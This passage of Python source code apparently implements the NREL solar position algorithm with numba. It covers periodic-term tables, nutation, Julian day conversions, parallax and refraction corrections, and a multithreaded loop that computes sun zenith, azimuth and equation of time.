[28.0, 1.21, 6286.6],
[28.0, 1.9, 6279.55],
[26.0, 4.59, 10447.39]]),
'R1': np.array(
[[103019.0, 1.10749, 6283.07585],
[1721.0, 1.0644, 12566.1517],
[702.0, 3.142, 0.0],
[32.0, 1.02, 18849.23],
[31.0, 2.84, 5507.55],
[25.0, 1.32, 5223.69],
[18.0, 1.42, 1577.34],
[10.0, 5.91, 10977.08],
[9.0, 1.42, 6275.96],
[9.0, 0.27, 5486.78]]),
'R2': np.array(
[[4359.0, 5.7846, 6283.0758],
[124.0, 5.579, 12566.152],
[12.0, 3.14, 0.0],
[9.0, 3.63, 77713.77],
[6.0, 1.87, 5573.14],
[3.0, 5.47, 18849.23]]),
'R3': np.array(
[[145.0, 4.273, 6283.076],
[7.0, 3.92, 12566.15]]),
'R4': np.array(
[[4.0, 2.56, 6283.08]])
}
# Target (rows, cols) for each sub-table: pad every order of a table group
# (L, B, R) to the row count of its largest member (L0=64, B0=5, R0=40).
resize_mapping = {
    'L1': (64, 3), 'L2': (64, 3), 'L3': (64, 3), 'L4': (64, 3), 'L5': (64, 3),
    'B1': (5, 3), 'R1': (40, 3), 'R2': (40, 3), 'R3': (40, 3), 'R4': (40, 3)}

# make arrays uniform size for efficient broadcasting in numba, fill with 0s
# np.resize does not work because it fills with repeated copies
for key, dims in resize_mapping.items():
    # Zero-amplitude padding rows contribute nothing to the cosine sums
    # computed downstream, so this is numerically harmless.
    new_rows = dims[0] - TABLE_1_DICT[key].shape[0]
    TABLE_1_DICT[key] = np.append(TABLE_1_DICT[key], np.zeros((new_rows, 3)),
                                  axis=0)
# Stack the (padded) per-order tables into 3-D arrays indexed as
# [order, row, (A, B, C)] so the jitted loops can address them uniformly.
HELIO_LONG_TABLE = np.array([TABLE_1_DICT['L0'],
                             TABLE_1_DICT['L1'],
                             TABLE_1_DICT['L2'],
                             TABLE_1_DICT['L3'],
                             TABLE_1_DICT['L4'],
                             TABLE_1_DICT['L5']])
HELIO_LAT_TABLE = np.array([TABLE_1_DICT['B0'],
                            TABLE_1_DICT['B1']])
HELIO_RADIUS_TABLE = np.array([TABLE_1_DICT['R0'],
                               TABLE_1_DICT['R1'],
                               TABLE_1_DICT['R2'],
                               TABLE_1_DICT['R3'],
                               TABLE_1_DICT['R4']])
NUTATION_ABCD_ARRAY = np.array([
[-171996, -174.2, 92025, 8.9],
[-13187, -1.6, 5736, -3.1],
[-2274, -0.2, 977, -0.5],
[2062, 0.2, -895, 0.5],
[1426, -3.4, 54, -0.1],
[712, 0.1, -7, 0],
[-517, 1.2, 224, -0.6],
[-386, -0.4, 200, 0],
[-301, 0, 129, -0.1],
[217, -0.5, -95, 0.3],
[-158, 0, 0, 0],
[129, 0.1, -70, 0],
[123, 0, -53, 0],
[63, 0, 0, 0],
[63, 0.1, -33, 0],
[-59, 0, 26, 0],
[-58, -0.1, 32, 0],
[-51, 0, 27, 0],
[48, 0, 0, 0],
[46, 0, -24, 0],
[-38, 0, 16, 0],
[-31, 0, 13, 0],
[29, 0, 0, 0],
[29, 0, -12, 0],
[26, 0, 0, 0],
[-22, 0, 0, 0],
[21, 0, -10, 0],
[17, -0.1, 0, 0],
[16, 0, -8, 0],
[-16, 0.1, 7, 0],
[-15, 0, 9, 0],
[-13, 0, 7, 0],
[-12, 0, 6, 0],
[11, 0, 0, 0],
[-10, 0, 5, 0],
[-8, 0, 3, 0],
[7, 0, -3, 0],
[-7, 0, 0, 0],
[-7, 0, 3, 0],
[-7, 0, 3, 0],
[6, 0, 0, 0],
[6, 0, -3, 0],
[6, 0, -3, 0],
[-6, 0, 3, 0],
[-6, 0, 3, 0],
[5, 0, 0, 0],
[-5, 0, 3, 0],
[-5, 0, 3, 0],
[-5, 0, 3, 0],
[4, 0, 0, 0],
[4, 0, 0, 0],
[4, 0, 0, 0],
[-4, 0, 0, 0],
[-4, 0, 0, 0],
[-4, 0, 0, 0],
[3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
])
NUTATION_YTERM_ARRAY = np.array([
[0, 0, 0, 0, 1],
[-2, 0, 0, 2, 2],
[0, 0, 0, 2, 2],
[0, 0, 0, 0, 2],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[-2, 1, 0, 2, 2],
[0, 0, 0, 2, 1],
[0, 0, 1, 2, 2],
[-2, -1, 0, 2, 2],
[-2, 0, 1, 0, 0],
[-2, 0, 0, 2, 1],
[0, 0, -1, 2, 2],
[2, 0, 0, 0, 0],
[0, 0, 1, 0, 1],
[2, 0, -1, 2, 2],
[0, 0, -1, 0, 1],
[0, 0, 1, 2, 1],
[-2, 0, 2, 0, 0],
[0, 0, -2, 2, 1],
[2, 0, 0, 2, 2],
[0, 0, 2, 2, 2],
[0, 0, 2, 0, 0],
[-2, 0, 1, 2, 2],
[0, 0, 0, 2, 0],
[-2, 0, 0, 2, 0],
[0, 0, -1, 2, 1],
[0, 2, 0, 0, 0],
[2, 0, -1, 0, 1],
[-2, 2, 0, 2, 2],
[0, 1, 0, 0, 1],
[-2, 0, 1, 0, 1],
[0, -1, 0, 0, 1],
[0, 0, 2, -2, 0],
[2, 0, -1, 2, 1],
[2, 0, 1, 2, 2],
[0, 1, 0, 2, 2],
[-2, 1, 1, 0, 0],
[0, -1, 0, 2, 2],
[2, 0, 0, 2, 1],
[2, 0, 1, 0, 0],
[-2, 0, 2, 2, 2],
[-2, 0, 1, 2, 1],
[2, 0, -2, 0, 1],
[2, 0, 0, 0, 1],
[0, -1, 1, 0, 0],
[-2, -1, 0, 2, 1],
[-2, 0, 0, 0, 1],
[0, 0, 2, 2, 1],
[-2, 0, 2, 0, 1],
[-2, 1, 0, 2, 1],
[0, 0, 1, -2, 0],
[-1, 0, 1, 0, 0],
[-2, 1, 0, 0, 0],
[1, 0, 0, 0, 0],
[0, 0, 1, 2, 0],
[0, 0, -2, 2, 2],
[-1, -1, 1, 0, 0],
[0, 1, 1, 0, 0],
[0, -1, 1, 2, 2],
[2, -1, -1, 2, 2],
[0, 0, 3, 2, 2],
[2, -1, 0, 2, 2],
])
@jcompile('float64(int64, int64, int64, int64, int64, int64, int64)',
          nopython=True)
def julian_day_dt(year, month, day, hour, minute, second, microsecond):
    """This is the original way to calculate the julian day from the NREL paper.
    However, it is much faster to convert to unix/epoch time and then convert
    to julian day. Note that the date must be UTC."""
    # January/February are treated as months 13/14 of the previous year.
    if month <= 2:
        year = year-1
        month = month+12
    # Gregorian calendar correction term.
    a = int(year/100)
    b = 2 - a + int(a * 0.25)
    # Convert microseconds to seconds before summing. The original code
    # added the raw microsecond count directly to whole seconds, inflating
    # the Julian day by up to ~11.5 days whenever microsecond != 0.
    frac_of_day = (microsecond / 1e6 + (second + minute * 60 + hour * 3600)
                   ) * 1.0 / (3600*24)
    d = day + frac_of_day
    jd = (int(365.25 * (year + 4716)) + int(30.6001 * (month + 1)) + d +
          b - 1524.5)
    return jd
@jcompile('float64(float64)', nopython=True)
def julian_day(unixtime):
    """Julian day from a Unix timestamp (seconds, UTC).

    2440587.5 is the Julian day of the Unix epoch, 1970-01-01T00:00 UTC.
    """
    return unixtime * 1.0 / 86400 + 2440587.5
@jcompile('float64(float64, float64)', nopython=True)
def julian_ephemeris_day(julian_day, delta_t):
    """Julian ephemeris day: Julian day shifted by delta_t seconds."""
    return julian_day + delta_t * 1.0 / 86400
@jcompile('float64(float64)', nopython=True)
def julian_century(julian_day):
    """Julian centuries since the J2000.0 epoch (JD 2451545)."""
    return (julian_day - 2451545) * 1.0 / 36525
@jcompile('float64(float64)', nopython=True)
def julian_ephemeris_century(julian_ephemeris_day):
    """Julian ephemeris centuries since J2000.0 (JD 2451545)."""
    return (julian_ephemeris_day - 2451545) * 1.0 / 36525
@jcompile('float64(float64)', nopython=True)
def julian_ephemeris_millennium(julian_ephemeris_century):
    """Julian ephemeris millennia: simply centuries divided by ten."""
    return julian_ephemeris_century * 1.0 / 10
@jcompile('float64(float64)', nopython=True)
def heliocentric_longitude(jme):
    """Earth heliocentric longitude in degrees (mod 360) for the given
    Julian ephemeris millennium, from the L0-L5 periodic term tables."""
    l0 = 0.0
    l1 = 0.0
    l2 = 0.0
    l3 = 0.0
    l4 = 0.0
    l5 = 0.0
    # The sub-tables were zero-padded to a common row count, so a single
    # loop bound serves every order; padding rows add A=0 terms.
    for row in range(HELIO_LONG_TABLE.shape[1]):
        l0 += (HELIO_LONG_TABLE[0, row, 0]
               * np.cos(HELIO_LONG_TABLE[0, row, 1]
                        + HELIO_LONG_TABLE[0, row, 2] * jme)
               )
        l1 += (HELIO_LONG_TABLE[1, row, 0]
               * np.cos(HELIO_LONG_TABLE[1, row, 1]
                        + HELIO_LONG_TABLE[1, row, 2] * jme)
               )
        l2 += (HELIO_LONG_TABLE[2, row, 0]
               * np.cos(HELIO_LONG_TABLE[2, row, 1]
                        + HELIO_LONG_TABLE[2, row, 2] * jme)
               )
        l3 += (HELIO_LONG_TABLE[3, row, 0]
               * np.cos(HELIO_LONG_TABLE[3, row, 1]
                        + HELIO_LONG_TABLE[3, row, 2] * jme)
               )
        l4 += (HELIO_LONG_TABLE[4, row, 0]
               * np.cos(HELIO_LONG_TABLE[4, row, 1]
                        + HELIO_LONG_TABLE[4, row, 2] * jme)
               )
        l5 += (HELIO_LONG_TABLE[5, row, 0]
               * np.cos(HELIO_LONG_TABLE[5, row, 1]
                        + HELIO_LONG_TABLE[5, row, 2] * jme)
               )
    # Polynomial in jme of the per-order sums, scaled by 1e-8 to radians.
    l_rad = (l0 + l1 * jme + l2 * jme**2 + l3 * jme**3 + l4 * jme**4 +
             l5 * jme**5)/10**8
    l = np.rad2deg(l_rad)
    return l % 360
@jcompile('float64(float64)', nopython=True)
def heliocentric_latitude(jme):
    """Earth heliocentric latitude in degrees from the B0/B1 term tables."""
    b0 = 0.0
    b1 = 0.0
    # B1 is zero-padded to B0's row count, so one loop bound serves both.
    for row in range(HELIO_LAT_TABLE.shape[1]):
        b0 += (HELIO_LAT_TABLE[0, row, 0]
               * np.cos(HELIO_LAT_TABLE[0, row, 1]
                        + HELIO_LAT_TABLE[0, row, 2] * jme)
               )
        b1 += (HELIO_LAT_TABLE[1, row, 0]
               * np.cos(HELIO_LAT_TABLE[1, row, 1]
                        + HELIO_LAT_TABLE[1, row, 2] * jme)
               )
    # Scale by 1e-8 to radians, then convert to degrees.
    b_rad = (b0 + b1 * jme)/10**8
    b = np.rad2deg(b_rad)
    return b
@jcompile('float64(float64)', nopython=True)
def heliocentric_radius_vector(jme):
    """Earth-sun distance in astronomical units from the R0-R4 term tables."""
    r0 = 0.0
    r1 = 0.0
    r2 = 0.0
    r3 = 0.0
    r4 = 0.0
    # R1-R4 are zero-padded to R0's row count; padding adds A=0 terms.
    for row in range(HELIO_RADIUS_TABLE.shape[1]):
        r0 += (HELIO_RADIUS_TABLE[0, row, 0]
               * np.cos(HELIO_RADIUS_TABLE[0, row, 1]
                        + HELIO_RADIUS_TABLE[0, row, 2] * jme)
               )
        r1 += (HELIO_RADIUS_TABLE[1, row, 0]
               * np.cos(HELIO_RADIUS_TABLE[1, row, 1]
                        + HELIO_RADIUS_TABLE[1, row, 2] * jme)
               )
        r2 += (HELIO_RADIUS_TABLE[2, row, 0]
               * np.cos(HELIO_RADIUS_TABLE[2, row, 1]
                        + HELIO_RADIUS_TABLE[2, row, 2] * jme)
               )
        r3 += (HELIO_RADIUS_TABLE[3, row, 0]
               * np.cos(HELIO_RADIUS_TABLE[3, row, 1]
                        + HELIO_RADIUS_TABLE[3, row, 2] * jme)
               )
        r4 += (HELIO_RADIUS_TABLE[4, row, 0]
               * np.cos(HELIO_RADIUS_TABLE[4, row, 1]
                        + HELIO_RADIUS_TABLE[4, row, 2] * jme)
               )
    # Polynomial in jme of the per-order sums, scaled by 1e-8.
    r = (r0 + r1 * jme + r2 * jme**2 + r3 * jme**3 + r4 * jme**4)/10**8
    return r
@jcompile('float64(float64)', nopython=True)
def geocentric_longitude(heliocentric_longitude):
    """Geocentric longitude: heliocentric value rotated 180 deg, mod 360."""
    return (heliocentric_longitude + 180.0) % 360
@jcompile('float64(float64)', nopython=True)
def geocentric_latitude(heliocentric_latitude):
    """Geocentric latitude: the negated heliocentric latitude."""
    return -1.0 * heliocentric_latitude
@jcompile('float64(float64)', nopython=True)
def mean_elongation(julian_ephemeris_century):
    """X0: mean elongation of the moon from the sun, in degrees."""
    x0 = (297.85036
          + 445267.111480 * julian_ephemeris_century
          - 0.0019142 * julian_ephemeris_century**2
          + julian_ephemeris_century**3 / 189474)
    return x0
@jcompile('float64(float64)', nopython=True)
def mean_anomaly_sun(julian_ephemeris_century):
    """X1: mean anomaly of the sun (Earth), in degrees."""
    x1 = (357.52772
          + 35999.050340 * julian_ephemeris_century
          - 0.0001603 * julian_ephemeris_century**2
          - julian_ephemeris_century**3 / 300000)
    return x1
@jcompile('float64(float64)', nopython=True)
def mean_anomaly_moon(julian_ephemeris_century):
    """X2: mean anomaly of the moon, in degrees."""
    x2 = (134.96298
          + 477198.867398 * julian_ephemeris_century
          + 0.0086972 * julian_ephemeris_century**2
          + julian_ephemeris_century**3 / 56250)
    return x2
@jcompile('float64(float64)', nopython=True)
def moon_argument_latitude(julian_ephemeris_century):
    """X3: the moon's argument of latitude, in degrees."""
    x3 = (93.27191
          + 483202.017538 * julian_ephemeris_century
          - 0.0036825 * julian_ephemeris_century**2
          + julian_ephemeris_century**3 / 327270)
    return x3
@jcompile('float64(float64)', nopython=True)
def moon_ascending_longitude(julian_ephemeris_century):
    """X4: longitude of the moon's ascending node, in degrees."""
    x4 = (125.04452
          - 1934.136261 * julian_ephemeris_century
          + 0.0020708 * julian_ephemeris_century**2
          + julian_ephemeris_century**3 / 450000)
    return x4
@jcompile('float64(float64, float64, float64, float64, float64, float64)',
          nopython=True)
def longitude_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
    """Nutation in longitude (delta-psi), in degrees, from the tabulated
    Y-term coefficients and A/B amplitudes."""
    delta_psi_sum = 0
    for row in range(NUTATION_YTERM_ARRAY.shape[0]):
        a = NUTATION_ABCD_ARRAY[row, 0]
        b = NUTATION_ABCD_ARRAY[row, 1]
        # Weighted combination of the five fundamental arguments x0..x4.
        argsin = (NUTATION_YTERM_ARRAY[row, 0]*x0 +
                  NUTATION_YTERM_ARRAY[row, 1]*x1 +
                  NUTATION_YTERM_ARRAY[row, 2]*x2 +
                  NUTATION_YTERM_ARRAY[row, 3]*x3 +
                  NUTATION_YTERM_ARRAY[row, 4]*x4)
        term = (a + b * julian_ephemeris_century) * np.sin(np.radians(argsin))
        delta_psi_sum += term
    # 1/36000000 deg = 0.0001 arcsec: converts tabulated units to degrees.
    delta_psi = delta_psi_sum*1.0/36000000
    return delta_psi
@jcompile('float64(float64, float64, float64, float64, float64, float64)',
          nopython=True)
def obliquity_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
    """Nutation in obliquity (delta-epsilon), in degrees, from the tabulated
    Y-term coefficients and C/D amplitudes."""
    delta_eps_sum = 0.0
    for row in range(NUTATION_YTERM_ARRAY.shape[0]):
        c = NUTATION_ABCD_ARRAY[row, 2]
        d = NUTATION_ABCD_ARRAY[row, 3]
        # Weighted combination of the five fundamental arguments x0..x4.
        argcos = (NUTATION_YTERM_ARRAY[row, 0]*x0 +
                  NUTATION_YTERM_ARRAY[row, 1]*x1 +
                  NUTATION_YTERM_ARRAY[row, 2]*x2 +
                  NUTATION_YTERM_ARRAY[row, 3]*x3 +
                  NUTATION_YTERM_ARRAY[row, 4]*x4)
        term = (c + d * julian_ephemeris_century) * np.cos(np.radians(argcos))
        delta_eps_sum += term
    # 1/36000000 deg = 0.0001 arcsec: converts tabulated units to degrees.
    delta_eps = delta_eps_sum*1.0/36000000
    return delta_eps
@jcompile('float64(float64)', nopython=True)
def mean_ecliptic_obliquity(julian_ephemeris_millennium):
    """Mean obliquity of the ecliptic, in arcseconds, as a 10th-order
    polynomial in U = JME/10."""
    U = 1.0*julian_ephemeris_millennium/10
    e0 = (84381.448 - 4680.93 * U - 1.55 * U**2
          + 1999.25 * U**3 - 51.38 * U**4 - 249.67 * U**5
          - 39.05 * U**6 + 7.12 * U**7 + 27.87 * U**8
          + 5.79 * U**9 + 2.45 * U**10)
    return e0
@jcompile('float64(float64, float64)', nopython=True)
def true_ecliptic_obliquity(mean_ecliptic_obliquity, obliquity_nutation):
    """True obliquity: mean value converted from arcseconds to degrees,
    plus the nutation correction (already in degrees)."""
    return mean_ecliptic_obliquity * 1.0 / 3600 + obliquity_nutation
@jcompile('float64(float64)', nopython=True)
def aberration_correction(earth_radius_vector):
    """Aberration correction in degrees (-20.4898 arcsec scaled by 1/R)."""
    return -20.4898 / (3600 * earth_radius_vector)
@jcompile('float64(float64, float64, float64)', nopython=True)
def apparent_sun_longitude(geocentric_longitude, longitude_nutation,
                           aberration_correction):
    """Apparent sun longitude: geocentric longitude plus nutation and
    aberration corrections (all in degrees)."""
    return (geocentric_longitude + longitude_nutation
            + aberration_correction)
@jcompile('float64(float64, float64)', nopython=True)
def mean_sidereal_time(julian_day, julian_century):
    """Mean sidereal time at Greenwich, in degrees (mod 360)."""
    v0 = (280.46061837 + 360.98564736629 * (julian_day - 2451545)
          + 0.000387933 * julian_century**2 - julian_century**3 / 38710000)
    return v0 % 360.0
@jcompile('float64(float64, float64, float64)', nopython=True)
def apparent_sidereal_time(mean_sidereal_time, longitude_nutation,
                           true_ecliptic_obliquity):
    """Apparent sidereal time: mean value corrected for nutation projected
    onto the equator."""
    correction = longitude_nutation * np.cos(
        np.radians(true_ecliptic_obliquity))
    return mean_sidereal_time + correction
@jcompile('float64(float64, float64, float64)', nopython=True)
def geocentric_sun_right_ascension(apparent_sun_longitude,
                                   true_ecliptic_obliquity,
                                   geocentric_latitude):
    """Geocentric sun right ascension in degrees, reduced to [0, 360)."""
    numerator = (np.sin(np.radians(apparent_sun_longitude))
                 * np.cos(np.radians(true_ecliptic_obliquity))
                 - np.tan(np.radians(geocentric_latitude))
                 * np.sin(np.radians(true_ecliptic_obliquity)))
    denominator = np.cos(np.radians(apparent_sun_longitude))
    return np.degrees(np.arctan2(numerator, denominator)) % 360
@jcompile('float64(float64, float64, float64)', nopython=True)
def geocentric_sun_declination(apparent_sun_longitude, true_ecliptic_obliquity,
                               geocentric_latitude):
    """Geocentric sun declination in degrees."""
    sin_delta = (np.sin(np.radians(geocentric_latitude)) *
                 np.cos(np.radians(true_ecliptic_obliquity)) +
                 np.cos(np.radians(geocentric_latitude)) *
                 np.sin(np.radians(true_ecliptic_obliquity)) *
                 np.sin(np.radians(apparent_sun_longitude)))
    return np.degrees(np.arcsin(sin_delta))
@jcompile('float64(float64, float64, float64)', nopython=True)
def local_hour_angle(apparent_sidereal_time, observer_longitude,
                     sun_right_ascension):
    """Local hour angle in degrees, measured westward from south, [0, 360)."""
    hour_angle = apparent_sidereal_time + observer_longitude - sun_right_ascension
    return hour_angle % 360
@jcompile('float64(float64)', nopython=True)
def equatorial_horizontal_parallax(earth_radius_vector):
    """Equatorial horizontal parallax of the sun in degrees (R in AU)."""
    return 8.794 / (3600 * earth_radius_vector)
@jcompile('float64(float64)', nopython=True)
def uterm(observer_latitude):
    """Intermediate parallax term u (radians) from the observer latitude."""
    return np.arctan(0.99664719 * np.tan(np.radians(observer_latitude)))
@jcompile('float64(float64, float64, float64)', nopython=True)
def xterm(u, observer_latitude, observer_elevation):
    """Intermediate parallax term x (elevation is in meters)."""
    return (np.cos(u) + observer_elevation / 6378140
            * np.cos(np.radians(observer_latitude)))
@jcompile('float64(float64, float64, float64)', nopython=True)
def yterm(u, observer_latitude, observer_elevation):
    """Intermediate parallax term y (elevation is in meters)."""
    return (0.99664719 * np.sin(u) + observer_elevation / 6378140
            * np.sin(np.radians(observer_latitude)))
@jcompile('float64(float64, float64,float64, float64)', nopython=True)
def parallax_sun_right_ascension(xterm, equatorial_horizontal_parallax,
                                 local_hour_angle, geocentric_sun_declination):
    """Parallax correction to right ascension, in degrees."""
    sin_xi = np.sin(np.radians(equatorial_horizontal_parallax))
    numerator = -xterm * sin_xi * np.sin(np.radians(local_hour_angle))
    denominator = (np.cos(np.radians(geocentric_sun_declination))
                   - xterm * sin_xi
                   * np.cos(np.radians(local_hour_angle)))
    return np.degrees(np.arctan2(numerator, denominator))
@jcompile('float64(float64, float64)', nopython=True)
def topocentric_sun_right_ascension(geocentric_sun_right_ascension,
                                    parallax_sun_right_ascension):
    """Topocentric right ascension: geocentric value plus parallax term."""
    return geocentric_sun_right_ascension + parallax_sun_right_ascension
@jcompile('float64(float64, float64, float64, float64, float64, float64)',
          nopython=True)
def topocentric_sun_declination(geocentric_sun_declination, xterm, yterm,
                                equatorial_horizontal_parallax,
                                parallax_sun_right_ascension,
                                local_hour_angle):
    """Sun declination as seen by the observer (parallax corrected), degrees."""
    sin_xi = np.sin(np.radians(equatorial_horizontal_parallax))
    numerator = ((np.sin(np.radians(geocentric_sun_declination)) - yterm
                  * sin_xi)
                 * np.cos(np.radians(parallax_sun_right_ascension)))
    denominator = (np.cos(np.radians(geocentric_sun_declination)) - xterm
                   * sin_xi
                   * np.cos(np.radians(local_hour_angle)))
    return np.degrees(np.arctan2(numerator, denominator))
@jcompile('float64(float64, float64)', nopython=True)
def topocentric_local_hour_angle(local_hour_angle,
                                 parallax_sun_right_ascension):
    """Topocentric hour angle: geocentric value minus the parallax term."""
    return local_hour_angle - parallax_sun_right_ascension
@jcompile('float64(float64, float64, float64)', nopython=True)
def topocentric_elevation_angle_without_atmosphere(observer_latitude,
                                                   topocentric_sun_declination,
                                                   topocentric_local_hour_angle
                                                   ):
    """Sun elevation in degrees, ignoring atmospheric refraction."""
    lat_rad = np.radians(observer_latitude)
    dec_rad = np.radians(topocentric_sun_declination)
    ha_rad = np.radians(topocentric_local_hour_angle)
    return np.degrees(np.arcsin(
        np.sin(lat_rad)
        * np.sin(dec_rad)
        + np.cos(lat_rad)
        * np.cos(dec_rad)
        * np.cos(ha_rad)))
@jcompile('float64(float64, float64, float64, float64)', nopython=True)
def atmospheric_refraction_correction(local_pressure, local_temp,
                                      topocentric_elevation_angle_wo_atmosphere,
                                      atmos_refract):
    """Refraction correction (degrees) scaled by local pressure (millibars)
    and temperature (degrees C)."""
    # switch zeroes delta_e when the sun is below the horizon: multiplying
    # by the boolean (0/1) works for both scalars (numba) and arrays (numpy)
    switch = topocentric_elevation_angle_wo_atmosphere >= -1.0 * (
        0.26667 + atmos_refract)
    delta_e = ((local_pressure / 1010.0) * (283.0 / (273 + local_temp))
               * 1.02 / (60 * np.tan(np.radians(
                   topocentric_elevation_angle_wo_atmosphere
                   + 10.3 / (topocentric_elevation_angle_wo_atmosphere
                             + 5.11))))) * switch
    return delta_e
@jcompile('float64(float64, float64)', nopython=True)
def topocentric_elevation_angle(topocentric_elevation_angle_without_atmosphere,
                                atmospheric_refraction_correction):
    """Refracted elevation: vacuum elevation plus refraction correction."""
    return (topocentric_elevation_angle_without_atmosphere
            + atmospheric_refraction_correction)
@jcompile('float64(float64)', nopython=True)
def topocentric_zenith_angle(topocentric_elevation_angle):
    """Zenith angle in degrees: complement of the elevation angle."""
    return 90 - topocentric_elevation_angle
@jcompile('float64(float64, float64, float64)', nopython=True)
def topocentric_astronomers_azimuth(topocentric_local_hour_angle,
                                    topocentric_sun_declination,
                                    observer_latitude):
    """Astronomers' azimuth in degrees (measured from south), [0, 360)."""
    numerator = np.sin(np.radians(topocentric_local_hour_angle))
    denominator = (np.cos(np.radians(topocentric_local_hour_angle))
                   * np.sin(np.radians(observer_latitude))
                   - np.tan(np.radians(topocentric_sun_declination))
                   * np.cos(np.radians(observer_latitude)))
    return np.degrees(np.arctan2(numerator, denominator)) % 360
@jcompile('float64(float64)', nopython=True)
def topocentric_azimuth_angle(topocentric_astronomers_azimuth):
    """Navigators' azimuth (measured from north): shift by 180, wrap 360."""
    return (topocentric_astronomers_azimuth + 180) % 360
@jcompile('float64(float64)', nopython=True)
def sun_mean_longitude(julian_ephemeris_millennium):
    """Mean longitude of the sun in degrees (polynomial in JME)."""
    jme = julian_ephemeris_millennium
    return (280.4664567 + 360007.6982779 * jme
            + 0.03032028 * jme**2
            + jme**3 / 49931
            - jme**4 / 15300
            - jme**5 / 2000000)
@jcompile('float64(float64, float64, float64, float64)', nopython=True)
def equation_of_time(sun_mean_longitude, geocentric_sun_right_ascension,
                     longitude_nutation, true_ecliptic_obliquity):
    """Equation of time (apparent minus mean solar time) in minutes."""
    E = (sun_mean_longitude - 0.0057183 - geocentric_sun_right_ascension +
         longitude_nutation * np.cos(np.radians(true_ecliptic_obliquity)))
    # limit between 0 and 360
    E = E % 360
    # convert to minutes
    E *= 4
    # branchless wrap into [-20, 20] minutes: exactly one of the three
    # boolean factors is true, so this works for scalars (numba) and arrays
    greater = E > 20
    less = E < -20
    other = (E <= 20) & (E >= -20)
    E = greater * (E - 1440) + less * (E + 1440) + other * E
    return E
@jcompile('void(float64[:], float64[:], float64[:,:])', nopython=True,
          nogil=True)
def solar_position_loop(unixtime, loc_args, out):
    """Loop through the time array and calculate the solar position.

    loc_args packs [lat, lon, elev, pressure, temp, delta_t, atmos_refract,
    sst, esd]. Results are written into `out` in place; the number of rows
    used depends on the sst/esd flags (see solar_position_numba).
    """
    lat = loc_args[0]
    lon = loc_args[1]
    elev = loc_args[2]
    pressure = loc_args[3]
    temp = loc_args[4]
    delta_t = loc_args[5]
    atmos_refract = loc_args[6]
    sst = loc_args[7]
    esd = loc_args[8]
    for i in range(unixtime.shape[0]):
        utime = unixtime[i]
        # time scales: Julian day/century/millennium on UT and ephemeris time
        jd = julian_day(utime)
        jde = julian_ephemeris_day(jd, delta_t)
        jc = julian_century(jd)
        jce = julian_ephemeris_century(jde)
        jme = julian_ephemeris_millennium(jce)
        R = heliocentric_radius_vector(jme)
        if esd:
            # caller only wants the earth-sun distance
            out[0, i] = R
            continue
        L = heliocentric_longitude(jme)
        B = heliocentric_latitude(jme)
        Theta = geocentric_longitude(L)
        beta = geocentric_latitude(B)
        # five fundamental arguments feeding the nutation series
        x0 = mean_elongation(jce)
        x1 = mean_anomaly_sun(jce)
        x2 = mean_anomaly_moon(jce)
        x3 = moon_argument_latitude(jce)
        x4 = moon_ascending_longitude(jce)
        delta_psi = longitude_nutation(jce, x0, x1, x2, x3, x4)
        delta_epsilon = obliquity_nutation(jce, x0, x1, x2, x3, x4)
        epsilon0 = mean_ecliptic_obliquity(jme)
        epsilon = true_ecliptic_obliquity(epsilon0, delta_epsilon)
        delta_tau = aberration_correction(R)
        lamd = apparent_sun_longitude(Theta, delta_psi, delta_tau)
        v0 = mean_sidereal_time(jd, jc)
        v = apparent_sidereal_time(v0, delta_psi, epsilon)
        alpha = geocentric_sun_right_ascension(lamd, epsilon, beta)
        delta = geocentric_sun_declination(lamd, epsilon, beta)
        if sst:
            # sunrise/sunset/transit callers only need these three values
            out[0, i] = v
            out[1, i] = alpha
            out[2, i] = delta
            continue
        m = sun_mean_longitude(jme)
        eot = equation_of_time(m, alpha, delta_psi, epsilon)
        H = local_hour_angle(v, lon, alpha)
        xi = equatorial_horizontal_parallax(R)
        # parallax corrections for the observer's position on the geoid
        u = uterm(lat)
        x = xterm(u, lat, elev)
        y = yterm(u, lat, elev)
        delta_alpha = parallax_sun_right_ascension(x, xi, H, delta)
        delta_prime = topocentric_sun_declination(delta, x, y, xi, delta_alpha,
                                                  H)
        H_prime = topocentric_local_hour_angle(H, delta_alpha)
        e0 = topocentric_elevation_angle_without_atmosphere(lat, delta_prime,
                                                            H_prime)
        delta_e = atmospheric_refraction_correction(pressure, temp, e0,
                                                    atmos_refract)
        e = topocentric_elevation_angle(e0, delta_e)
        theta = topocentric_zenith_angle(e)
        theta0 = topocentric_zenith_angle(e0)
        gamma = topocentric_astronomers_azimuth(H_prime, delta_prime, lat)
        phi = topocentric_azimuth_angle(gamma)
        # rows: apparent zenith, zenith, apparent elevation, elevation,
        # azimuth, equation of time
        out[0, i] = theta
        out[1, i] = theta0
        out[2, i] = e
        out[3, i] = e0
        out[4, i] = phi
        out[5, i] = eot
def solar_position_numba(unixtime, lat, lon, elev, pressure, temp, delta_t,
                         atmos_refract, numthreads, sst=False, esd=False):
    """Calculate the solar position using the numba compiled functions
    and multiple threads. Very slow if functions are not numba compiled.

    Returns a (dims, len(unixtime)) float64 array; dims is 3 when sst is
    True (sidereal time, right ascension, declination), 1 when esd is True
    (earth-sun distance), otherwise 6 (see solar_position_loop).
    """
    # these args are the same for each thread
    loc_args = np.array([lat, lon, elev, pressure, temp, delta_t,
                         atmos_refract, sst, esd])
    # construct dims x ulength array to put the results in
    ulength = unixtime.shape[0]
    if sst:
        dims = 3
    elif esd:
        dims = 1
    else:
        dims = 6
    result = np.empty((dims, ulength), dtype=np.float64)
    if unixtime.dtype != np.float64:
        unixtime = unixtime.astype(np.float64)
    if ulength < numthreads:
        # BUG FIX: the original message used a '%s' placeholder with
        # str.format(), so the thread count was never interpolated.
        warnings.warn('The number of threads is more than the length of '
                      'the time array. Only using {} threads.'.format(ulength))
        numthreads = ulength
    if numthreads <= 1:
        # single-threaded fast path: no need to split/spawn
        solar_position_loop(unixtime, loc_args, result)
        return result
    # split the input and output arrays into numthreads chunks; the output
    # views alias `result`, so each thread writes its slice in place
    split0 = np.array_split(unixtime, numthreads)
    split2 = np.array_split(result, numthreads, axis=1)
    chunks = [[a0, loc_args, split2[i]] for i, a0 in enumerate(split0)]
    # Spawn one thread per chunk (the jitted loop releases the GIL)
    threads = [threading.Thread(target=solar_position_loop, args=chunk)
